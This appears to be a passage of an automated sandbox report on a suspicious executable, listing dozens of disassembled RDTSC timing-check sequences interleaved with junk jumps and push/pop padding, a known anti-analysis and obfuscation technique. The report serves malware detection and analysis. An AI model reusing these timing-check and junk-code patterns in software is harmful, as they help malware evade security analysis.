                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3577B second address: A35781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35881 second address: A358CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F0C44E7DD66h 0x00000009 jmp 00007F0C44E7DD6Eh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jne 00007F0C44E7DD85h 0x0000001b mov eax, dword ptr [eax] 0x0000001d je 00007F0C44E7DD6Eh 0x00000023 push edi 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35991 second address: A35995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3AE3B second address: A3AE3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3AE3F second address: A3AE45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3AE45 second address: A3AE53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F0C44E7DD72h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3AE53 second address: A3AE59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3AE59 second address: A3AE67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jbe 00007F0C44E7DD66h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A39C93 second address: A39C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A1FC second address: A3A21E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44E7DD78h 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F0C44E7DD66h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A36B second address: A3A36F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A36F second address: A3A377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A40D65 second address: A40DA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44D4E18Eh 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F0C44D4E18Eh 0x00000011 jmp 00007F0C44D4E18Ah 0x00000016 push eax 0x00000017 jmp 00007F0C44D4E194h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3FA99 second address: A3FAAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44E7DD71h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3FAAE second address: A3FABF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44D4E18Ah 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3FBEC second address: A3FBF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3FBF2 second address: A3FBF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3FD41 second address: A3FD70 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0C44E7DD6Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0C44E7DD79h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3FD70 second address: A3FD76 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A401D0 second address: A401D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A401D4 second address: A401FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F0C44D4E195h 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jne 00007F0C44D4E186h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A401FF second address: A4021D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0C44E7DD66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jns 00007F0C44E7DD6Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4021D second address: A40221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A404AC second address: A404B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A404B0 second address: A404D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44D4E199h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A404D3 second address: A404D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A404D9 second address: A404DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A404DD second address: A40505 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0C44E7DD66h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007F0C44E7DD79h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4079E second address: A407A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A43EDD second address: A43EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F0C44E7DD66h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A43EEC second address: A43F16 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0C44D4E186h 0x00000008 js 00007F0C44D4E186h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F0C44D4E196h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48246 second address: A4827B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44E7DD76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0C44E7DD77h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4827B second address: A4827F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0C74A second address: A0C756 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0C756 second address: 9F5AA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F0C44D4E18Bh 0x0000000a popad 0x0000000b nop 0x0000000c push eax 0x0000000d mov dword ptr [ebp+122D1D49h], esi 0x00000013 pop edi 0x00000014 lea eax, dword ptr [ebp+1246E4FBh] 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007F0C44D4E188h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 00000018h 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 jmp 00007F0C44D4E190h 0x00000039 mov di, 2FB3h 0x0000003d push eax 0x0000003e jnp 00007F0C44D4E18Ah 0x00000044 mov dword ptr [esp], eax 0x00000047 jng 00007F0C44D4E19Ah 0x0000004d jmp 00007F0C44D4E194h 0x00000052 call dword ptr [ebp+122D393Fh] 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b push edi 0x0000005c pop edi 0x0000005d push esi 0x0000005e pop esi 0x0000005f jmp 00007F0C44D4E196h 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0D5BB second address: A0D605 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44E7DD71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F0C44E7DD68h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push 0000001Eh 0x00000029 mov ecx, dword ptr [ebp+122D2B8Bh] 0x0000002f nop 0x00000030 pushad 0x00000031 pushad 0x00000032 pushad 0x00000033 popad 0x00000034 push ebx 0x00000035 pop ebx 0x00000036 popad 0x00000037 push esi 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0DAB2 second address: A0DB3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44D4E195h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jc 00007F0C44D4E18Ch 0x00000010 add edi, 63BD561Dh 0x00000016 lea eax, dword ptr [ebp+1246E53Fh] 0x0000001c mov dword ptr [ebp+122D1E8Ch], ecx 0x00000022 nop 0x00000023 jmp 00007F0C44D4E18Ah 0x00000028 push eax 0x00000029 jbe 00007F0C44D4E18Ah 0x0000002f nop 0x00000030 mov dword ptr [ebp+122D37BCh], esi 0x00000036 lea eax, dword ptr [ebp+1246E4FBh] 0x0000003c xor dword ptr [ebp+122D1D21h], edi 0x00000042 nop 0x00000043 jno 00007F0C44D4E19Bh 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F0C44D4E193h 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0DB3F second address: A0DB49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F0C44E7DD66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A47516 second address: A4751A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A47684 second address: A47689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A47689 second address: A47699 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F0C44D4E186h 0x0000000a jng 00007F0C44D4E186h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A47699 second address: A476B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44E7DD6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F0C44E7DD99h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A476B4 second address: A476B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A476B8 second address: A476BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A476BC second address: A476C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A476C2 second address: A476CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A47AF8 second address: A47B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0C44D4E192h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A47B11 second address: A47B17 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4D965 second address: A4D970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4D970 second address: A4D974 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4D974 second address: A4D97E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0C44D4E186h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C2F3 second address: A4C337 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0C44E7DD66h 0x00000008 jmp 00007F0C44E7DD6Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F0C44E7DD72h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F0C44E7DD79h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C337 second address: A4C35B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0C44D4E196h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007F0C44D4E188h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C5F1 second address: A4C5FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C5FA second address: A4C5FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4CD18 second address: A4CD57 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0C44E7DD66h 0x00000008 jmp 00007F0C44E7DD76h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jne 00007F0C44E7DD7Fh 0x00000015 jmp 00007F0C44E7DD77h 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4D1A6 second address: A4D207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44D4E199h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push edi 0x0000000d jmp 00007F0C44D4E198h 0x00000012 pop edi 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jne 00007F0C44D4E18Ch 0x0000001c jl 00007F0C44D4E186h 0x00000022 pushad 0x00000023 jmp 00007F0C44D4E18Eh 0x00000028 pushad 0x00000029 popad 0x0000002a js 00007F0C44D4E186h 0x00000030 popad 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5173A second address: A5173E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A53C06 second address: A53C2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C44D4E190h 0x00000009 jmp 00007F0C44D4E191h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A53C2B second address: A53C31 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A53C31 second address: A53C55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F0C44D4E1B2h 0x0000000e jmp 00007F0C44D4E192h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A53C55 second address: A53C59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D510D second address: 9D5111 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D5111 second address: 9D5117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A56A37 second address: A56A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A56A3C second address: A56A75 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jns 00007F0C44E7DD66h 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c pushad 0x0000000d jmp 00007F0C44E7DD79h 0x00000012 js 00007F0C44E7DD66h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 push ecx 0x00000024 pop ecx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A56A75 second address: A56A8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44D4E193h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A56A8C second address: A56AA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F0C44E7DD77h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A565BD second address: A565C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0C44D4E186h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A565C7 second address: A565DF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0C44E7DD66h 0x00000008 jbe 00007F0C44E7DD66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jo 00007F0C44E7DD85h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A565DF second address: A56608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44D4E199h 0x00000009 popad 0x0000000a jbe 00007F0C44D4E1AEh 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A56608 second address: A56625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0C44E7DD66h 0x0000000a jmp 00007F0C44E7DD6Ch 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5A8D6 second address: A5A8FA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a jmp 00007F0C44D4E18Dh 0x0000000f popad 0x00000010 jc 00007F0C44D4E1C3h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5A8FA second address: A5A8FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5A8FE second address: A5A902 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5AA76 second address: A5AA80 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0C44E7DD66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5AA80 second address: A5AA9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F0C44D4E196h 0x0000000c pop eax 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5AA9E second address: A5AAB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44E7DD72h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5AAB6 second address: A5AAC6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5AAC6 second address: A5AAD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F0C44E7DD66h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5AFAB second address: A5AFB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5AFB1 second address: A5AFBF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F0C44E7DD66h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5AFBF second address: A5AFC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B0E9 second address: A5B0EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B0EF second address: A5B0F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B0F3 second address: A5B0FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0C44E7DD66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B0FF second address: A5B11B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C44D4E192h 0x00000009 jne 00007F0C44D4E186h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B11B second address: A5B138 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0C44E7DD73h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B138 second address: A5B13E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B13E second address: A5B142 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60231 second address: A60237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60237 second address: A6023B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
